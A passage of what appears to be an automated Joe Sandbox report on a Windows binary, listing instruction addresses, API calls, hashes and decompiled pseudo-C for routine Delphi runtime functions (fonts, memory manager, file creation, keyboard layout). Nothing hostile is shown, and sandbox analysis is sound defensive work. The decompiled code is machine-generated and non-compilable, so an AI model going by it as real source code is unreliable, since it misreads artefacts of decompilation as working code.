                                  0x00454a7f
                                  0x00454a82
                                  0x00454a82
                                  0x00454a87
                                  0x00454a8a
                                  0x00454a90
                                  0x00454a95
                                  0x00454a9f
                                  0x00454aa1
                                  0x00454aa6
                                  0x00454aa9
                                  0x00454aa9
                                  0x00454aaf
                                  0x00454ab9
                                  0x00454abb
                                  0x00454ac0
                                  0x00454ac3
                                  0x00454ac3
                                  0x00454ac9
                                  0x00454ad9
                                  0x00454aeb
                                  0x00454afd
                                  0x00454b05
                                  0x00454b0a
                                  0x00454b10
                                  0x00454b17
                                  0x00454b1e
                                  0x00454b24
                                  0x00454b2a
                                  0x00454b31
                                  0x00454b38
                                  0x00454b3f
                                  0x00454b52
                                  0x00454b54
                                  0x00454b5f
                                  0x00454b67
                                  0x00454b70
                                  0x00454b75
                                  0x00454b75
                                  0x00454b7b
                                  0x00454b7e
                                  0x00454b91
                                  0x00454b99
                                  0x00454bac
                                  0x00454bb9
                                  0x00454bc0
                                  0x00454bc2
                                  0x00454bcb
                                  0x00454bcb
                                  0x00454bd8
                                  0x00454bdf
                                  0x00454be1
                                  0x00454be1
                                  0x00454beb
                                  0x00454bf1
                                  0x00454bf6
                                  0x00454c07
                                  0x00454c12
                                  0x00454c17
                                  0x00454c1d
                                  0x00454c25
                                  0x00454c29
                                  0x00454c29
                                  0x00454c2e
                                  0x00454c32
                                  0x00454c36
                                  0x00454c3a
                                  0x00454c43
                                  0x00454c4b
                                  0x00454c52
                                  0x00454c57
                                  0x00454c5d
                                  0x00454c5f
                                  0x00454c64
                                  0x00454c6b
                                  0x00454c75

                                  APIs
                                  • LoadIconA.USER32(00400000,MAINICON), ref: 00454B67
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440F50,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00454B99
                                  • OemToCharA.USER32(?,?), ref: 00454BAC
                                  • CharNextA.USER32(?,00400000,?,00000100,?,?,?,00440F50,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00454BEB
                                  • CharLowerA.USER32(00000000,?,00400000,?,00000100,?,?,?,00440F50,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00454BF1
                                    • Part of subcall function 00454DBC: GetClassInfoA.USER32 ref: 00454E1B
                                    • Part of subcall function 00454DBC: RegisterClassA.USER32 ref: 00454E33
                                    • Part of subcall function 00454DBC: SetWindowLongA.USER32 ref: 00454ECF
                                    • Part of subcall function 00454DBC: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00454EF1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
                                  • String ID: MAINICON
                                  • API String ID: 2763768735-2283262055
                                  • Opcode ID: a971928b379ed62e67f92584156a638d0b6216b3f26efbe11004fc7510dec769
                                  • Instruction ID: a5d0ee8b058183cc28b8085fb3a1a620d47b4c75ef1d8a2d30d8b7fa40885917
                                  • Opcode Fuzzy Hash: a971928b379ed62e67f92584156a638d0b6216b3f26efbe11004fc7510dec769
                                  • Instruction Fuzzy Hash: 895173706042449FDB40EF29D8C5B863BE4AB55309F4480FAEC48DF397D7B99988CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00454054, Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 86%
                                  			E00454054(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				signed char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				intOrPtr _t66;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x470b40 != 0) {
					_t54 =  *0x470b40; // 0x0
					_v5 =  *(_t54 + 0x88) & 0x000000ff;
				}
				_push(_t74);
				_push(0x45419b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x470b40 != 0) {
					_t52 =  *0x470b40; // 0x0
					E00456B3C(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0041D838( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E0041D838( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0x94000000
					E0041D91C( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0041D838( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0x94000000
					E0041D838( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0041D838( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0x94000000
				E0041D63C( *_t16, 0xff000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E0041D63C( *_t17, 0xff000007);
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(0x4541a2);
				if( *0x470b40 != 0) {
					_t38 =  *0x470b40; // 0x0
					return E00456B3C(_t38, _v5 & 0x000000ff);
				}
				return 0;
			}























                                  0x00454054
                                  0x00454055
                                  0x00454057
                                  0x0045405e
                                  0x00454060
                                  0x0045406b
                                  0x0045406d
                                  0x00454079
                                  0x00454079
                                  0x0045407e
                                  0x0045407f
                                  0x00454084
                                  0x00454087
                                  0x00454091
                                  0x00454095
                                  0x0045409a
                                  0x0045409a
                                  0x004540b0
                                  0x004540cc
                                  0x004540d3
                                  0x004540d9
                                  0x004540b2
                                  0x004540b6
                                  0x004540bd
                                  0x004540c3
                                  0x004540c3
                                  0x004540de
                                  0x004540f5
                                  0x004540fc
                                  0x00454132
                                  0x0045413d
                                  0x00454144
                                  0x0045414b
                                  0x00454151
                                  0x004540fe
                                  0x00454105
                                  0x0045410c
                                  0x00454112
                                  0x0045411e
                                  0x00454125
                                  0x0045412b
                                  0x0045412b
                                  0x00454156
                                  0x00454161
                                  0x00454166
                                  0x00454171
                                  0x00454178
                                  0x0045417b
                                  0x0045417e
                                  0x0045418a
                                  0x00454190
                                  0x00000000
                                  0x00454195
                                  0x0045419a

                                  APIs
                                  • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004540A9
                                  • CreateFontIndirectA.GDI32(?), ref: 004540B6
                                  • GetStockObject.GDI32(0000000D), ref: 004540CC
                                    • Part of subcall function 0041D91C: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041D929
                                  • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 004540F5
                                  • CreateFontIndirectA.GDI32(?), ref: 00454105
                                  • CreateFontIndirectA.GDI32(?), ref: 0045411E
                                  • GetStockObject.GDI32(0000000D), ref: 00454144
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                  • String ID:
                                  • API String ID: 2891467149-0
                                  • Opcode ID: 097e7dd5a140271ab4e0f1fe3780ff60882b91e72990156bdc5ee2b6fd0039de
                                  • Instruction ID: 1c5afefc91e9e3d657ab10b91448fc6a73b8a75925d093f732c062defb83fc42
                                  • Opcode Fuzzy Hash: 097e7dd5a140271ab4e0f1fe3780ff60882b91e72990156bdc5ee2b6fd0039de
                                  • Instruction Fuzzy Hash: C231C030714200ABD710FBA9CC46B9A73E4AB44308F514076BE0CDB297DB7899C9CB29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401AE4, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 566 401ae4-401aef 567 401bc2-401bc4 566->567 568 401af5-401b0a 566->568 569 401b16-401b35 LocalFree 568->569 570 401b0c-401b11 RtlEnterCriticalSection 568->570 571 401b49-401b4f 569->571 570->569 572 401b51-401b77 call 4013d8 * 3 571->572 573 401b37-401b47 VirtualFree 571->573 580 401b90-401ba4 572->580 581 401b79-401b8e LocalFree 572->581 573->571 583 401bb0-401bba RtlDeleteCriticalSection 580->583 584 401ba6-401bab RtlLeaveCriticalSection 580->584 581->580 581->581 584->583
                                  C-Code - Quality: 72%
                                  			E00401AE4() {
				void* _t2;
				void* _t4;
				intOrPtr* _t20;
				void* _t21;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4705c0 == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401BBB);
					_push( *[fs:eax]);
					 *[fs:eax] = _t28;
					if( *0x470049 != 0) {
						_push(0x4705c8);
						L00401370();
					}
					 *0x4705c0 = 0;
					_t4 =  *0x470620; // 0x0
					LocalFree(_t4);
					 *0x470620 = 0;
					_t20 =  *0x4705e8; // 0x4705e8
					while(_t20 != 0x4705e8) {
						_t1 = _t20 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000); // executed
						_t20 =  *_t20;
					}
					E004013D8(0x4705e8);
					E004013D8(0x4705f8);
					E004013D8(0x470624);
					_t21 =  *0x4705e0; // 0x0
					while(_t21 != 0) {
						 *0x4705e0 =  *_t21;
						LocalFree(_t21);
						_t21 =  *0x4705e0; // 0x0
					}
					_pop(_t24);
					 *[fs:eax] = _t24;
					_push(0x401bc2);
					if( *0x470049 != 0) {
						_push(0x4705c8);
						L00401378();
					}
					_push(0x4705c8);
					L00401380();
					return 0;
				}
			}










                                  0x00401ae5
                                  0x00401aef
                                  0x00401bc4
                                  0x00401af5
                                  0x00401af7
                                  0x00401af8
                                  0x00401afd
                                  0x00401b00
                                  0x00401b0a
                                  0x00401b0c
                                  0x00401b11
                                  0x00401b11
                                  0x00401b16
                                  0x00401b1d
                                  0x00401b23
                                  0x00401b2a
                                  0x00401b2f
                                  0x00401b49
                                  0x00401b3e
                                  0x00401b42
                                  0x00401b47
                                  0x00401b47
                                  0x00401b56
                                  0x00401b60
                                  0x00401b6a
                                  0x00401b6f
                                  0x00401b77
                                  0x00401b7b
                                  0x00401b81
                                  0x00401b86
                                  0x00401b8c
                                  0x00401b92
                                  0x00401b95
                                  0x00401b98
                                  0x00401ba4
                                  0x00401ba6
                                  0x00401bab
                                  0x00401bab
                                  0x00401bb0
                                  0x00401bb5
                                  0x00401bba
                                  0x00401bba

                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(Function_000705C8,00000000,00401BBB), ref: 00401B11
                                  • LocalFree.KERNEL32(00000000,00000000,00401BBB), ref: 00401B23
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401BBB), ref: 00401B42
                                  • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401BBB), ref: 00401B81
                                  • RtlLeaveCriticalSection.KERNEL32(Function_000705C8,00401BC2,00000000,00000000,00401BBB), ref: 00401BAB
                                  • RtlDeleteCriticalSection.KERNEL32(Function_000705C8,00401BC2,00000000,00000000,00401BBB), ref: 00401BB5
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                  • String ID:
                                  • API String ID: 3782394904-0
                                  • Opcode ID: a90460f84af10d68d4834b73fcccb8d4a75ad201c2ce3c469a13e6ed06d5fbec
                                  • Instruction ID: 5da7ee02dd3990a8179c8bff4f367911b9b70c4f51f5b977864fdeba06431de5
                                  • Opcode Fuzzy Hash: a90460f84af10d68d4834b73fcccb8d4a75ad201c2ce3c469a13e6ed06d5fbec
                                  • Instruction Fuzzy Hash: 1D118470202740AAE750EB75AC91F2A36E8A746744F444077F50CEA6F2D77C68848B1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041603C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 83%
                                  			E0041603C(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, signed short _a8) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t28;
				void* _t48;
				void* _t62;
				void* _t63;
				intOrPtr _t67;
				intOrPtr _t69;
				char _t70;
				intOrPtr _t73;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t70 = __edx;
				_t63 = __ecx;
				_t87 = _t88;
				_t89 = _t88 + 0xffffffdc;
				_v36 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				if(__edx != 0) {
					_t89 = _t89 + 0xfffffff0;
					_t28 = E004036BC(_t28, _t87);
				}
				_t85 = _t63;
				_v5 = _t70;
				_t62 = _t28;
				_t83 = _a8;
				_push(_t87);
				_push(0x41617a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				if(_a8 != 0xffff) {
					E00415F34(E00408424(_t85, _t83 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t62 + 4)) < 0) {
						E00408828(_t85,  &_v36);
						_v24 = _v36;
						_v20 = 0xb;
						E0040B01C(GetLastError(),  &_v40);
						_v16 = _v40;
						_v12 = 0xb;
						_t67 =  *0x46f9a8; // 0x410940
						E0040B928(_t62, _t67, 1, _t83, _t85, 1,  &_v24);
						E00403B64();
					}
				} else {
					_t48 = CreateFileA(E004045DC(_t85), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
					E00415F34(_t48, 0);
					if( *((intOrPtr*)(_t62 + 4)) < 0) {
						E00408828(_t85,  &_v28);
						_v24 = _v28;
						_v20 = 0xb;
						E0040B01C(GetLastError(),  &_v32);
						_v16 = _v32;
						_v12 = 0xb;
						_t69 =  *0x46fdc0; // 0x410938
						E0040B928(_t62, _t69, 1, _t83, _t85, 1,  &_v24);
						E00403B64();
					}
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(E00416181);
				return E00404140( &_v40, 4);
			}
























                                  0x0041603c
                                  0x0041603c
                                  0x0041603d
                                  0x0041603f
                                  0x00416047
                                  0x0041604a
                                  0x0041604d
                                  0x00416050
                                  0x00416055
                                  0x00416057
                                  0x0041605a
                                  0x0041605a
                                  0x0041605f
                                  0x00416061
                                  0x00416064
                                  0x00416066
                                  0x0041606b
                                  0x0041606c
                                  0x00416071
                                  0x00416074
                                  0x0041607c
                                  0x0041610c
                                  0x00416115
                                  0x0041611c
                                  0x00416124
                                  0x00416127
                                  0x00416133
                                  0x0041613b
                                  0x0041613e
                                  0x00416148
                                  0x00416155
                                  0x0041615a
                                  0x0041615a
                                  0x0041607e
                                  0x00416098
                                  0x004160a3
                                  0x004160ac
                                  0x004160b7
                                  0x004160bf
                                  0x004160c2
                                  0x004160ce
                                  0x004160d6
                                  0x004160d9
                                  0x004160e3
                                  0x004160f0
                                  0x004160f5
                                  0x004160f5
                                  0x004160ac
                                  0x00416161
                                  0x00416164
                                  0x00416167
                                  0x00416179

                                  APIs
                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,0041617A,?,?,00412020,00000001), ref: 00416098
                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,0041617A,?,?,00412020,00000001), ref: 004160C6
                                    • Part of subcall function 00408424: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,00412020,00416106,00000000,0041617A,?,?,00412020), ref: 00408472
                                    • Part of subcall function 00408828: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,00412020,00416121,00000000,0041617A,?,?,00412020,00000001), ref: 00408847
                                  • GetLastError.KERNEL32(00000000,0041617A,?,?,00412020,00000001), ref: 0041612B
                                    • Part of subcall function 0040B01C: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000), ref: 0040B03B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                  • String ID: 8A$@A
                                  • API String ID: 503785936-3417271196
                                  • Opcode ID: 6baa3fec48cac93b196265584cd8af881f428efd9606a6422453efb081aa99d3
                                  • Instruction ID: 2d1d410ca380f408bcedd66532c35719c719d195cb2580b4103ebeede3b8d25c
                                  • Opcode Fuzzy Hash: 6baa3fec48cac93b196265584cd8af881f428efd9606a6422453efb081aa99d3
                                  • Instruction Fuzzy Hash: D7314470A006049FDB10EFA989427DEBBF5AB49304F51807AE504BB3C2D77959458BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045385C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 84%
                                  			E0045385C(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E004036BC(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E00419AE4(_t63, 0);
				_t28 =  *0x46fa74; // 0x46e3b0
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x453c00;
				_t29 =  *0x46fa80; // 0x46e3b8
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x453c0c;
				E00453C18(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E00403368(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E00403368(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E00403368(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E00403368(1);
				_t42 = E00403368(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L004066E4();
				_t75 = _t42;
				L0040641C();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L00406944();
				_t11 = _t62 + 0x58; // 0x44c2786e
				_t45 =  *0x46fbd4; // 0x470920
				 *((intOrPtr*)( *_t45))(0, 0, E0044F920,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E0041D468(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E0041D468(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E0041D468(1);
				E00454054(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x453f18;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x453f18;
				_t21 = _t62 + 0x80; // 0x94000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x453f18;
				_t59 = _t62;
				if(_v5 != 0) {
					E00403714(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}























                                  0x0045385c
                                  0x0045385c
                                  0x00453864
                                  0x00453866
                                  0x00453869
                                  0x00453869
                                  0x0045386e
                                  0x00453871
                                  0x00453877
                                  0x0045387c
                                  0x00453881
                                  0x00453884
                                  0x0045388a
                                  0x0045388f
                                  0x00453892
                                  0x0045389a
                                  0x004538a6
                                  0x004538b5
                                  0x004538c4
                                  0x004538d3
                                  0x004538e2
                                  0x004538ec
                                  0x004538f1
                                  0x004538f6
                                  0x004538fb
                                  0x00453900
                                  0x00453905
                                  0x0045390b
                                  0x00453910
                                  0x0045391e
                                  0x00453925
                                  0x00453933
                                  0x00453945
                                  0x00453957
                                  0x0045395f
                                  0x00453964
                                  0x00453964
                                  0x0045396a
                                  0x0045396d
                                  0x00453974
                                  0x00453974
                                  0x0045397a
                                  0x0045397d
                                  0x00453984
                                  0x00453984
                                  0x0045398a
                                  0x0045398d
                                  0x00453994
                                  0x0045399a
                                  0x0045399c
                                  0x004539a1
                                  0x004539a8
                                  0x004539b1

                                  APIs
                                  • GetKeyboardLayout.USER32(00000000), ref: 004538A1
                                  • 72E7AC50.USER32(00000000,?,?,00000000,?,00440F3A,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 004538F6
                                  • 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00440F3A,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00453900
                                  • 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00440F3A,00000000,00000000,?,00000000,?,00000000), ref: 0045390B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B380KeyboardLayout
                                  • String ID: G
                                  • API String ID: 648844651-4269207688
                                  • Opcode ID: 0e9601a85dce75a326e045158b6e68fc395887a2c7c23a29b069aeec360f8a19
                                  • Instruction ID: bed6efe629424c4c62093f41002e0a171e8a7d575386f60ba0c89031240d5bee
                                  • Opcode Fuzzy Hash: 0e9601a85dce75a326e045158b6e68fc395887a2c7c23a29b069aeec360f8a19
                                  • Instruction Fuzzy Hash: FF310BB06002409FD740EF2AD8C1B887BE4BB05749F44817AED08DF3A3DB799908CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401A1C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 651 401a1c-401a3e RtlInitializeCriticalSection 652 401a40-401a45 RtlEnterCriticalSection 651->652 653 401a4a-401a80 call 4013d8 * 3 LocalAlloc 651->653 652->653 660 401ab1-401ac5 653->660 661 401a82 653->661 665 401ad1 660->665 666 401ac7-401acc RtlLeaveCriticalSection 660->666 662 401a87-401a99 661->662 662->662 664 401a9b-401aaa 662->664 664->660 666->665
                                  C-Code - Quality: 68%
                                  			E00401A1C() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push("�U ");
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4705c8);
				L00401368();
				if( *0x470049 != 0) {
					_push(0x4705c8);
					L00401370();
				}
				E004013D8(0x4705e8);
				E004013D8(0x4705f8);
				E004013D8(0x470624);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x470620 = _t11;
				if( *0x470620 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x470620; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x47060c)) = 0x470608;
					 *0x470608 = 0x470608;
					 *0x470614 = 0x470608;
					 *0x4705c0 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401AD9);
				if( *0x470049 != 0) {
					_push(0x4705c8);
					L00401378();
					return 0;
				}
				return 0;
			}








                                  0x00401a21
                                  0x00401a22
                                  0x00401a27
                                  0x00401a2a
                                  0x00401a2d
                                  0x00401a32
                                  0x00401a3e
                                  0x00401a40
                                  0x00401a45
                                  0x00401a45
                                  0x00401a4f
                                  0x00401a59
                                  0x00401a63
                                  0x00401a6f
                                  0x00401a74
                                  0x00401a80
                                  0x00401a82
                                  0x00401a87
                                  0x00401a87
                                  0x00401a8f
                                  0x00401a93
                                  0x00401a94
                                  0x00401aa0
                                  0x00401aa3
                                  0x00401aa5
                                  0x00401aaa
                                  0x00401aaa
                                  0x00401ab3
                                  0x00401ab6
                                  0x00401ab9
                                  0x00401ac5
                                  0x00401ac7
                                  0x00401acc
                                  0x00000000
                                  0x00401acc
                                  0x00401ad1

                                  APIs
                                  • RtlInitializeCriticalSection.KERNEL32(004705C8,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401A32
                                  • RtlEnterCriticalSection.KERNEL32(004705C8,004705C8,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401A45
                                  • LocalAlloc.KERNEL32(00000000,00000FF8,004705C8,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401A6F
                                  • RtlLeaveCriticalSection.KERNEL32(004705C8,00401AD9,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401ACC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                  • String ID: U
                                  • API String ID: 730355536-412294469
                                  • Opcode ID: 770628684a133dcd58a89cca7823b4e392e29c7d3efb34c4d650fefa6f37cac1
                                  • Instruction ID: ea62dc7227c28dd4ff7ad979da99f98fcac367bad80a53be389a553cf0931291
                                  • Opcode Fuzzy Hash: 770628684a133dcd58a89cca7823b4e392e29c7d3efb34c4d650fefa6f37cac1
                                  • Instruction Fuzzy Hash: 4301C870647740EEF355EB6AA815B293AC0E786704F40807BF409E6AF2C6BC4490CF5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044E4C0, Relevance: 7.7, APIs: 5, Instructions: 176COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
